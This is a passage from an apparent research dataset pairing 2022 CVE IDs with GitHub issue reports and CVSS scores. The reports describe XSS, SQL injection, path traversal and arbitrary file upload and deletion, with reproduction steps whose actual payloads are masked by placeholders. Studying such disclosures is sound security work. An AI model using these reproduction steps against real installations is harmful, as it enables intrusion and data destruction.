\u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG Any further discussion for these vulnerabilities including fix is welcomed and look forward to hearing from you. Feel free to contact me at EMAILTAG",
  79686. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  79687. "severity": "MEDIUM",
  79688. "baseScore": 5.5,
  79689. "impactScore": 3.6,
  79690. "exploitabilityScore": 1.8
  79691. },
  79692. {
  79693. "CVE_ID": "CVE-2022-24615",
  79694. "Issue_Url_old": "https://github.com/srikanth-lingala/zip4j/issues/418",
  79695. "Issue_Url_new": "https://github.com/srikanth-lingala/zip4j/issues/418",
  79696. "Repo_new": "srikanth-lingala/zip4j",
  79697. "Issue_Created_At": "2022-03-31T09:40:41Z",
  79698. "description": "Does CVETAG affect versions NUMBERTAG and NUMBERTAG According to the NVD description of CVETAG URLTAG , CVETAG affects up to NUMBERTAG excluded). Actually NUMBERTAG and NUMBERTAG are also affected by CVETAG . Don't the versions affected by nvd CVETAG need to be modified?",
  79699. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  79700. "severity": "MEDIUM",
  79701. "baseScore": 5.5,
  79702. "impactScore": 3.6,
  79703. "exploitabilityScore": 1.8
  79704. },
  79705. {
  79706. "CVE_ID": "CVE-2022-24615",
  79707. "Issue_Url_old": "https://github.com/srikanth-lingala/zip4j/issues/377",
  79708. "Issue_Url_new": "https://github.com/srikanth-lingala/zip4j/issues/377",
  79709. "Repo_new": "srikanth-lingala/zip4j",
  79710. "Issue_Created_At": "2021-10-24T15:43:05Z",
  79711. "description": "Collection of Recent Reported Bugs for zip4j NUMBERTAG Recently we ( Zhang Cen URLTAG and Huang Wenjie URLTAG found and submitted several bugs of latest zip4j NUMBERTAG For your convenience, here lists the bug summary for all reported bugs (will keep it updated). Note that each issue is a unique bug (we sorted and refined them from thousands of crashes) Any discussion about the bugs are welcome. URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG",
  79712. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  79713. "severity": "MEDIUM",
  79714. "baseScore": 5.5,
  79715. "impactScore": 3.6,
  79716. "exploitabilityScore": 1.8
  79717. },
  79718. {
  79719. "CVE_ID": "CVE-2022-24620",
  79720. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1605",
  79721. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1605",
  79722. "Repo_new": "piwigo/piwigo",
  79723. "Issue_Created_At": "2022-02-02T19:14:54Z",
  79724. "description": "Piwigo NUMBERTAG ulnerable For Stored XSS Which Is Leading To Privilege Escalation. Hi, I found Stored XSS in Piwigo version NUMBERTAG APITAG tested older versions). Proof Of Concept NUMBERTAG Add an admin through webmaster's access NUMBERTAG Through the admin account open URLTAG NUMBERTAG Add APITAG APITAG space) in the group name field. Can use any malicious JS code, Now you can see XSS will pop up. Impact: In this way admin can easily takeover webmaster's access using FILETAG . Burp: ERRORTAG FILETAG Please fix the vulnerability & let me know :). Thank You! Chirag Artani URLTAG",
  79725. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  79726. "severity": "MEDIUM",
  79727. "baseScore": 5.4,
  79728. "impactScore": 2.7,
  79729. "exploitabilityScore": 2.3
  79730. },
  79731. {
  79732. "CVE_ID": "CVE-2022-24646",
  79733. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/18",
  79734. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/18",
  79735. "Repo_new": "kishan0725/hospital-management-system",
  79736. "Issue_Created_At": "2022-02-05T12:14:10Z",
  79737. "description": "VULNERABLE: SQL Injection exists in Hospital Management System. An attacker can inject query in PATHTAG via the APITAG parameters.. FILETAG Intercept contact info and save contents into a text APITAG FILETAG Run APITAG APITAG FILETAG Area of concern in FILETAG FILETAG",
  79738. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79739. "severity": "HIGH",
  79740. "baseScore": 7.5,
  79741. "impactScore": 3.6,
  79742. "exploitabilityScore": 3.9
  79743. },
  79744. {
  79745. "CVE_ID": "CVE-2022-24647",
  79746. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/23",
  79747. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/23",
  79748. "Repo_new": "cuppacms/cuppacms",
  79749. "Issue_Created_At": "2022-02-05T17:14:57Z",
  79750. "description": "Multiple Unauthorized Arbitrary File Deletion vulnerabilities. Vulnerability Name: Multiple Arbitrary File Deletion Date of Discovery NUMBERTAG Feb NUMBERTAG Product APITAG NUMBERTAG FILETAG Author: lyy Vulnerability Description: When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the APITAG function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker can leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. Proof of Concept NUMBERTAG ulnerable URL: FILETAG Vulnerable Code: line NUMBERTAG PATHTAG FILETAG Steps to Reproduce: APITAG the request directly through burp CODETAG Proof of Concept NUMBERTAG ulnerable URL: FILETAG Vulnerable Code: line NUMBERTAG PATHTAG FILETAG APITAG can traverse the directory to delete any file Steps to Reproduce: APITAG the request directly through burp CODETAG FILETAG APITAG can traverse directories and delete APITAG all files in the directory while deleting the directory, so as to achieve the effect of deleting any file",
  79751. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  79752. "severity": "HIGH",
  79753. "baseScore": 8.1,
  79754. "impactScore": 5.2,
  79755. "exploitabilityScore": 2.8
  79756. },
  79757. {
  79758. "CVE_ID": "CVE-2022-24676",
  79759. "Issue_Url_old": "https://github.com/hyyyp/HYBBS2/issues/33",
  79760. "Issue_Url_new": "https://github.com/hyyyp/hybbs2/issues/33",
  79761. "Repo_new": "hyyyp/hybbs2",
  79762. "Issue_Created_At": "2022-02-07T10:08:23Z",
  79763. "description": "There is an arbitrary file upload vulnerability in the HYBBS upload plugin function. There is an arbitrary file upload vulnerability in the HYBBS upload plugin function Vulnerability overview There is an arbitrary file upload vulnerability in the upload plugin function of the HYBBS management background, which can lead to server permissions. Vulnerability scope All versions prior to HYBBS NUMBERTAG ulnerability environment construction Clone the latest code factory library of HYBBS to the local, and then use phpstudy to build HYBBS. Vulnerability reproduction steps Make a malicious zip archive as shown below FILETAG Upload malicious zip archives in the management background upload plugin function FILETAG After uploading, it prompts that the upload was successful FILETAG It can be seen from the log of the folder monitoring software that HYBBS renamed the malicious compressed package and extracted it to the Plugin directory FILETAG FILETAG Vulnerability code analysis Locate the code of the plugin upload function FILETAG FILETAG HYBBS directly decompresses the compressed package and does not check the content of the compressed package, resulting in an arbitrary file upload vulnerability.",
  79764. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  79765. "severity": "HIGH",
  79766. "baseScore": 8.8,
  79767. "impactScore": 5.9,
  79768. "exploitabilityScore": 2.8
  79769. },
  79770. {
  79771. "CVE_ID": "CVE-2022-24677",
  79772. "Issue_Url_old": "https://github.com/hyyyp/HYBBS2/issues/34",
  79773. "Issue_Url_new": "https://github.com/hyyyp/hybbs2/issues/34",
  79774. "Repo_new": "hyyyp/hybbs2",
  79775. "Issue_Created_At": "2022-02-07T10:09:48Z",
  79776. "description": "There is an arbitrary file writing vulnerability in the HYBBS production plug in function. There is an arbitrary file writing vulnerability in the HYBBS production plug in function Vulnerability overview There is an arbitrary file writing vulnerability in the HYBBS management background making plugin function, which leads to the server permission being obtained. Vulnerability scope All versions prior to HYBBS NUMBERTAG ulnerability environment construction Clone the latest code factory library of HYBBS to the local, and then use phpstudy to build HYBBS. Vulnerability reproduction steps Fill in APITAG in the plugin description, and click the OK button. FILETAG Then it will prompt that the plugin was created successfully FILETAG From the folder monitoring software log, you can see that the program created the malicious file FILETAG FILETAG FILETAG Vulnerability code analysis Locate the code that makes the plug in function FILETAG It can be seen that the program directly writes the plugin related configuration information to FILETAG without any security filtering, resulting in an arbitrary file writing vulnerability.",
  79777. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79778. "severity": "CRITICAL",
  79779. "baseScore": 9.8,
  79780. "impactScore": 5.9,
  79781. "exploitabilityScore": 3.9
  79782. },
  79783. {
  79784. "CVE_ID": "CVE-2022-24721",
  79785. "Issue_Url_old": "https://github.com/cometd/cometd/issues/1146",
  79786. "Issue_Url_new": "https://github.com/cometd/cometd/issues/1146",
  79787. "Repo_new": "cometd/cometd",
  79788. "Issue_Created_At": "2022-02-22T16:39:08Z",
  79789. "description": "Review APITAG channel usage. APITAG version(s NUMBERTAG Description Review usage of channels used by APITAG (e.g. Oort and Seti ).",
  79790. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  79791. "severity": "HIGH",
  79792. "baseScore": 8.1,
  79793. "impactScore": 5.2,
  79794. "exploitabilityScore": 2.8
  79795. },
  79796. {
  79797. "CVE_ID": "CVE-2022-24725",
  79798. "Issue_Url_old": "https://github.com/ericcornelissen/shescape/issues/169",
  79799. "Issue_Url_new": "https://github.com/ericcornelissen/shescape/issues/169",
  79800. "Repo_new": "ericcornelissen/shescape",
  79801. "Issue_Created_At": "2022-02-19T18:00:52Z",
  79802. "description": "Trailing string APITAG in Bash not escaped properly by APITAG Bug Report Shescape version : APITAG =~ APITAG ~ ERRORTAG APITAG with interpolation escaping enabled the trailing ~ ERRORTAG APITAG with interpolation escaping enabled the trailing ~` should be escaped to avoid it being expanded when the argument is used. Working Example This bug was found by fuzzing, the crash result can be found here: FILETAG",
  79803. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  79804. "severity": "MEDIUM",
  79805. "baseScore": 5.5,
  79806. "impactScore": 3.6,
  79807. "exploitabilityScore": 1.8
  79808. },
  79809. {
  79810. "CVE_ID": "CVE-2022-24726",
  79811. "Issue_Url_old": "https://github.com/golang/go/issues/51112",
  79812. "Issue_Url_new": "https://github.com/golang/go/issues/51112",
  79813. "Repo_new": "golang/go",
  79814. "Issue_Created_At": "2022-02-09T20:13:46Z",
  79815. "description": "regexp: stack overflow (process exit) handling deeply nested regexp. On NUMBERTAG bit system, a large enough regexp can be deeply nested enough to cause goroutine stack overflows (the kind where the runtime says no more stack for you and exits). Specifically, APITAG APITAG NUMBERTAG is enough. I ran a test inside Google using C++ RE2 limiting the nesting depth of accepted expressions. A max depth of NUMBERTAG did not break any of our tests. (A max depth of NUMBERTAG did break one library that was mechanically generating a truly awful regular expression.) To fix the problem I intend to cap the maximum depth of a regexp accepted by APITAG at NUMBERTAG what is needed by Google C++ and really about NUMBERTAG what is reasonable. Depth means the depth of the parse tree: APITAG has depth NUMBERTAG as does APITAG in POSIX mode. (In Perl mode that's a syntax error.) This will need to be backported to Go NUMBERTAG and Go NUMBERTAG as well.",
  79816. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  79817. "severity": "HIGH",
  79818. "baseScore": 7.5,
  79819. "impactScore": 3.6,
  79820. "exploitabilityScore": 3.9
  79821. },
  79822. {
  79823. "CVE_ID": "CVE-2022-24739",
  79824. "Issue_Url_old": "https://github.com/ytdl-org/youtube-dl/issues/30691",
  79825. "Issue_Url_new": "https://github.com/ytdl-org/youtube-dl/issues/30691",
  79826. "Repo_new": "ytdl-org/youtube-dl",
  79827. "Issue_Created_At": "2022-02-27T11:53:30Z",
  79828. "description": "Add a way to not follow redirects. APITAG Checklist APITAG [x] I'm reporting a feature request [x] I've verified that I'm running youtube dl version APITAG [x] I've searched the bugtracker for similar feature requests including closed ones Description APITAG The generic extractor currently follows redirects blindly. This is not an issue when running youtube dl locally, however when it is used in a web app this can allow an attacker to run a SSRF attack. Even if the web app does not allow calling youtube dl on internal URLs, an attacker could still craft an external URL redirecting to an internal resource. Because of this, apps sending requests to arbitrary external URLs [should disable redirects in the HTTP client URLTAG but youtube dl provides no easy way to do this. I see two solutions to this: Add a way to disable the generic extractor Add a flag that would make this extractor not follow redirects",
  79829. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79830. "severity": "MEDIUM",
  79831. "baseScore": 6.1,
  79832. "impactScore": 2.7,
  79833. "exploitabilityScore": 2.8
  79834. },
  79835. {
  79836. "CVE_ID": "CVE-2022-24762",
  79837. "Issue_Url_old": "https://github.com/jcubic/sysend.js/issues/33",
  79838. "Issue_Url_new": "https://github.com/jcubic/sysend.js/issues/33",
  79839. "Repo_new": "jcubic/sysend.js",
  79840. "Issue_Created_At": "2022-03-13T12:52:34Z",
  79841. "description": "Leaking of potential sensitive user information on Cross Domain communication. If users use cross domain communication, attackers can create an iframe and listen to any messages sent from the app and also send messages to the app. This happens only in the same browser so this is low impact. Example exploit, if you upload this file to any domain, you can intercept messages from FILETAG APITAG",
  79842. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  79843. "severity": "MEDIUM",
  79844. "baseScore": 6.5,
  79845. "impactScore": 3.6,
  79846. "exploitabilityScore": 2.8
  79847. },
  79848. {
  79849. "CVE_ID": "CVE-2022-24778",
  79850. "Issue_Url_old": "https://github.com/containerd/imgcrypt/issues/69",
  79851. "Issue_Url_new": "https://github.com/containerd/imgcrypt/issues/69",
  79852. "Repo_new": "containerd/imgcrypt",
  79853. "Issue_Created_At": "2022-03-15T16:36:15Z",
  79854. "description": "APITAG not working for multi arch images. When a multi arch index descriptor is provided to the imgcrypt's APITAG func (e.g. via APITAG the library iterates over the manifests it refers to with the APITAG option set to true to perform a check only. That causes the cycle to stop on the first manifest in the collection as the condition here URLTAG will always be evaluated to true error regardless. Additionally, if reading any of the referred manifest's children returns an APITAG URLTAG , the cycle will exit with a nil error, thus, the authorization check passes incorrectly. Let's take for example the case where the cycle checks the first manifest in the collection (e.g. for amd NUMBERTAG on an arm/arm NUMBERTAG machine, the children of this manifest are not found since this is not the target platform and they are not pulled > the authorization check passes incorrectly. This issue is rarely reproducible on an amd NUMBERTAG machine as usually, this is the first manifest in the index descriptor.",
  79855. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79856. "severity": "HIGH",
  79857. "baseScore": 7.5,
  79858. "impactScore": 3.6,
  79859. "exploitabilityScore": 3.9
  79860. },
  79861. {
  79862. "CVE_ID": "CVE-2022-24815",
  79863. "Issue_Url_old": "https://github.com/jhipster/generator-jhipster/issues/18269",
  79864. "Issue_Url_new": "https://github.com/jhipster/generator-jhipster/issues/18269",
  79865. "Repo_new": "jhipster/generator-jhipster",
  79866. "Issue_Created_At": "2022-04-03T23:08:46Z",
  79867. "description": "SQL Injection in Reactive project. I don't know whether this is the right place to ask this though... In a reactive spring project with r2dbc, I found that SQL injection is actually possible. This may happen because of me, lacking knowledge on how to use r2dbc correctly. If it is case please let me know the correct usage. Setup Jhipster NUMBERTAG reactive with Spring APITAG Yes type of database? SQL JDL APITAG Change I made Make /api/ be accessible without authorization header Make GET /api/examples accept query parameter of name , and bind the parameter to the APITAG repository method Make a request to APITAG Result The sql rendered was APITAG That actually dropped the table APITAG",
  79868. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79869. "severity": "HIGH",
  79870. "baseScore": 8.1,
  79871. "impactScore": 5.9,
  79872. "exploitabilityScore": 2.2
  79873. },
  79874. {
  79875. "CVE_ID": "CVE-2022-24837",
  79876. "Issue_Url_old": "https://github.com/node-formidable/formidable/issues/808",
  79877. "Issue_Url_new": "https://github.com/node-formidable/formidable/issues/808",
  79878. "Repo_new": "node-formidable/formidable",
  79879. "Issue_Created_At": "2022-01-02T21:39:54Z",
  79880. "description": "uniq filenames. Whenever i encounter a \"need to generate a uniq filename\" and including dependencies and so forth like hexoid to generate them URLTAG and seeing stuff like: URLTAG Then i might sometimes link to this article: URLTAG APITAG URLTAG is suppose to help you with this... how about instead generate one uniq dir with mkdtemp and simple use the filename n NUMBERTAG instead (without extension)? APITAG my proposal: remove hexoid",
  79881. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  79882. "severity": "MEDIUM",
  79883. "baseScore": 5.3,
  79884. "impactScore": 1.4,
  79885. "exploitabilityScore": 3.9
  79886. },
  79887. {
  79888. "CVE_ID": "CVE-2022-24843",
  79889. "Issue_Url_old": "https://github.com/flipped-aurora/gin-vue-admin/issues/1002",
  79890. "Issue_Url_new": "https://github.com/flipped-aurora/gin-vue-admin/issues/1002",
  79891. "Repo_new": "flipped-aurora/gin-vue-admin",
  79892. "Issue_Created_At": "2022-04-02T07:25:03Z",
  79893. "description": "APITAG Security Issues NUMBERTAG luckyt0mat0. gin vue admin NUMBERTAG b Node NUMBERTAG Golang \u7248\u672c APITAG \u662f\u5426\u4f9d\u65e7\u5b58\u5728 \u53ef\u4ee5 bug\u63cf\u8ff0 \u53d1\u73b0\u4e86\u4e00\u4e2a\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6/\u4e0b\u8f7d\u5b89\u5168\u6f0f\u6d1e\uff0cwx\u8054\u7cfb~ \u4fee\u6539\u5efa\u8bae \u53c2\u6570\u6821\u9a8c\u4e0b\u5373\u53ef\u3002",
  79894. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79895. "severity": "HIGH",
  79896. "baseScore": 7.5,
  79897. "impactScore": 3.6,
  79898. "exploitabilityScore": 3.9
  79899. },
  79900. {
  79901. "CVE_ID": "CVE-2022-24851",
  79902. "Issue_Url_old": "https://github.com/LDAPAccountManager/lam/issues/170",
  79903. "Issue_Url_new": "https://github.com/ldapaccountmanager/lam/issues/170",
  79904. "Repo_new": "ldapaccountmanager/lam",
  79905. "Issue_Created_At": "2022-04-10T18:07:59Z",
  79906. "description": "Multiple vulnerabilities in LDAP Account Manager. Hello.. I am a security researcher, and with my friend Manthan( APITAG We reviewed the application and discovered multiple vulnerabilities NUMBERTAG Stored XSS Description The profile editor tool has an edit profile functionality, the parameters on this page are not properly sanitized and hence leads to stored XSS attacks. An authenticated user can store XSS payloads in the profiles, which gets triggered when any other user try to access the edit profile page. Impact APITAG (depends on how the server profile is configured.. if ldap users and ldap admin both can login to ldap account manager, an ldap user can write save xss payloads to trigger tasks as admin) Affected URL FILETAG POC : As an authenticated user navigate to the URL FILETAG FILETAG Create a new user profile for either user or group (editing profile will also work) and in description field add the XSS payload APITAG and save the profile. FILETAG Now whenever any authenticated user will edit this profile page, XSS payload will be triggered. FILETAG FILETAG NUMBERTAG Arbitrary jpg/png file read Description The pdf editor tool has an edit pdf profile functionality, the APITAG parameter in it is not properly sanitized and an user can enter relative paths like APITAG via tools like burpsuite. Later when a pdf is exported using the edited profile the pdf icon has the image on that path(if image is present). Impact Low APITAG is low, due to highly unlikelihood of ldap admin knowing the locations of images having any APITAG information. One possible attack vector is to enumerate tools/software on the system by checking for icon images.. like in this POC we can verify the server has vim installed) Affected URL FILETAG POC : As an authenticated user navigate to the URL FILETAG FILETAG Create a new pdf structure for either user or group (editing profile will also work) FILETAG With burpsuite proxy on, click on save. In burpsuite, replace the value of APITAG parameter to the path of image file, lets say APITAG for the icon file of vim and forward the request. FILETAG Now while exporting pdf for a user if that POC profile is selected, the exported pdf will have the vim logo image. FILETAG FILETAG We would have loved to fix these ourselves.... but _cries bcz of bad dev skills_.",
  79907. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  79908. "severity": "MEDIUM",
  79909. "baseScore": 4.8,
  79910. "impactScore": 2.7,
  79911. "exploitabilityScore": 1.7
  79912. },
  79913. {
  79914. "CVE_ID": "CVE-2022-24881",
  79915. "Issue_Url_old": "https://github.com/ballcat-projects/ballcat-codegen/issues/5",
  79916. "Issue_Url_new": "https://github.com/ballcat-projects/ballcat-codegen/issues/5",
  79917. "Repo_new": "ballcat-projects/ballcat-codegen",
  79918. "Issue_Created_At": "2022-04-25T07:01:20Z",
  79919. "description": "ballcat codegen template engine injection RCE. \u5df2\u4f7f\u7528wx\u8054\u7cfb~",
  79920. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79921. "severity": "CRITICAL",
  79922. "baseScore": 9.8,
  79923. "impactScore": 5.9,
  79924. "exploitabilityScore": 3.9
  79925. },
  79926. {
  79927. "CVE_ID": "CVE-2022-24890",
  79928. "Issue_Url_old": "https://github.com/nextcloud/spreed/issues/7048",
  79929. "Issue_Url_new": "https://github.com/nextcloud/spreed/issues/7048",
  79930. "Repo_new": "nextcloud/spreed",
  79931. "Issue_Created_At": "2022-03-24T08:52:02Z",
  79932. "description": "Connection can not be established without camera permission. How to use APITAG Please use the \ud83d\udc4d reaction URLTAG to show that you are affected by the same issue. Please don't comment if you have no relevant information to add. It's just extra noise for everyone subscribed to this issue. Subscribe to receive notifications on status change and new comments. Steps to reproduce NUMBERTAG As user A create a room with group NUMBERTAG where user B is a member of NUMBERTAG As user A set custom permissions for user B only change to remove the camera permission NUMBERTAG As user A start a call NUMBERTAG As user B try to join the call Expected behaviour User B can join and talk Actual behaviour User B is disconnecting and connecting all the time Talk app Talk app version: master Custom Signaling server configured: no Custom TURN server configured: no Custom STUN server configured: no Browser Microphone available: yes using fake stream Camera available: yes using fake stream Operating system: Ubuntu Browser name: Firefox Browser version NUMBERTAG Browser log FILETAG",
  79933. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
  79934. "severity": "MEDIUM",
  79935. "baseScore": 4.3,
  79936. "impactScore": 1.4,
  79937. "exploitabilityScore": 2.8
  79938. },
  79939. {
  79940. "CVE_ID": "CVE-2022-24900",
  79941. "Issue_Url_old": "https://github.com/onlaj/Piano-LED-Visualizer/issues/350",
  79942. "Issue_Url_new": "https://github.com/onlaj/piano-led-visualizer/issues/350",
  79943. "Repo_new": "onlaj/piano-led-visualizer",
  79944. "Issue_Created_At": "2022-04-28T20:25:57Z",
  79945. "description": "Security Vulnerability Found. Absolute Path Traversal due to incorrect use of APITAG call A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. This attack is also known as \u201cdot dot slash\u201d, \u201cdirectory traversal\u201d, \u201cdirectory climbing\u201d and \u201cbacktracking\u201d. Root Cause Analysis The APITAG call is unsafe for use with untrusted input. When the APITAG call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Please see the example below. CODETAG Since the \"malicious\" parameter represents an absolute path, the result of APITAG ignores the static directory completely. Hence, untrusted input is passed via the APITAG call to APITAG can lead to path traversal attacks. In this case, the problems occurs due to the following code : URLTAG Here, the value parameter is attacker controlled. This parameter passes through the unsafe APITAG call making the effective directory and filename passed to the APITAG call attacker controlled. This leads to a path traversal attack. Proof of Concept The bug can be verified using a proof of concept similar to the one shown below. APITAG Remediation This can be fixed by preventing flow of untrusted data to the vulnerable APITAG function. In case the application logic necessiates this behaviour, one can either use the APITAG to join untrusted paths or replace APITAG calls with APITAG calls. References OWASP Path Traversal URLTAG github/securitylab NUMBERTAG This bug was found using FILETAG",
  79946. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  79947. "severity": "HIGH",
  79948. "baseScore": 8.6,
  79949. "impactScore": 4.0,
  79950. "exploitabilityScore": 3.9
  79951. },
  79952. {
  79953. "CVE_ID": "CVE-2022-24902",
  79954. "Issue_Url_old": "https://github.com/PaulleDemon/tkVideoPlayer/issues/3",
  79955. "Issue_Url_new": "https://github.com/paulledemon/tkvideoplayer/issues/3",
  79956. "Repo_new": "paulledemon/tkvideoplayer",
  79957. "Issue_Created_At": "2022-04-29T17:24:07Z",
  79958. "description": "Huge memory usage even on small files.",
  79959. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
  79960. "severity": "MEDIUM",
  79961. "baseScore": 4.3,
  79962. "impactScore": 1.4,
  79963. "exploitabilityScore": 2.8
  79964. },
  79965. {
  79966. "CVE_ID": "CVE-2022-24961",
  79967. "Issue_Url_old": "https://github.com/portainer/portainer/issues/6420",
  79968. "Issue_Url_new": "https://github.com/portainer/portainer/issues/6420",
  79969. "Repo_new": "portainer/portainer",
  79970. "Issue_Created_At": "2022-01-19T03:36:29Z",
  79971. "description": "Added behavior for Edge agents to reject connections if not connected to within NUMBERTAG hrs. If an agent is running for more than NUMBERTAG days, and is not associated with a Portainer instance by then, it should start rejecting any incoming connections. This mechanism does not apply when using agent secret. [EE NUMBERTAG",
  79972. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79973. "severity": "CRITICAL",
  79974. "baseScore": 9.8,
  79975. "impactScore": 5.9,
  79976. "exploitabilityScore": 3.9
  79977. },
  79978. {
  79979. "CVE_ID": "CVE-2022-25013",
  79980. "Issue_Url_old": "https://github.com/gamonoid/icehrm/issues/284",
  79981. "Issue_Url_new": "https://github.com/gamonoid/icehrm/issues/284",
  79982. "Repo_new": "gamonoid/icehrm",
  79983. "Issue_Created_At": "2021-12-23T08:13:20Z",
  79984. "description": "Reflected XSS vulnerabilities NUMBERTAG in icehrm. Important note : This vulnerability was reported to the maintainers on No NUMBERTAG rd NUMBERTAG and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively. Description DOM XSS in FILETAG GET parameter key . The input to key GET parameter is unsanitized as required for the context (javascript context ), and gets reflected in the DOM. Proof of Concept Occurrence NUMBERTAG Request param key Request: CODETAG Follow the link : URLTAG URLTAG to test this vulnerability on the live demo version of the website. Occurence NUMBERTAG Request param fm The payload passed fm gets sanitized by PHP code. This could be bypassed by adding an extra GET param content with the value HTML . Thus backend will not sanitize any user input. ERRORTAG Follow the link : URLTAG URLTAG to test this vulnerability on the live demo version of the website. Impact This vulnerability is capable of script execution on the victim's browser. Cookies cannot be stealed since the user needs to be logged out for this page/attack to work. References URLTAG URLTAG Occurrences NUMBERTAG HTML sanitization can be bypassed with an extra APITAG GET param URLTAG URLTAG NUMBERTAG URLTAG URLTAG",
  79985. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79986. "severity": "MEDIUM",
  79987. "baseScore": 6.1,
  79988. "impactScore": 2.7,
  79989. "exploitabilityScore": 2.8
  79990. },
  79991. {
  79992. "CVE_ID": "CVE-2022-25014",
  79993. "Issue_Url_old": "https://github.com/gamonoid/icehrm/issues/283",
  79994. "Issue_Url_new": "https://github.com/gamonoid/icehrm/issues/283",
  79995. "Repo_new": "gamonoid/icehrm",
  79996. "Issue_Created_At": "2021-12-23T08:09:18Z",
  79997. "description": "Reflected XSS vulnerability NUMBERTAG in icehrm. Important note : This vulnerability was reported to the maintainers on No NUMBERTAG rd NUMBERTAG and there has been no response yet. So, I infer it makes sense to publish it publicly here for the good sake of everyone who is using this software actively. Description The input sent to GET parameter m gets reflected in a script generated in the page, and isn't sanitized properly, leading to a Reflected XSS vulnerability. You can try adding the payload APITAG into the URL bar for m parameter, in any of the pages in APITAG post login to see this in action. The server is taking in the content of parameter 'm', and generates the following script in the response enclosed within APITAG tags : ERRORTAG The APITAG parameter has the value passed in through m , which is unsanitized & gets reflected in the page. Proof of Concept NUMBERTAG login to the demo dashboard at FILETAG NUMBERTAG Follow the link : URLTAG URLTAG Impact A malicious actor can craft a link that when clicked by any user logged in (admin or normal user) can cause a Reflected XSS attack. This could lead to the leak of session credentials. Occurences URLTAG URLTAG",
  79998. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79999. "severity": "MEDIUM",
  80000. "baseScore": 6.1,
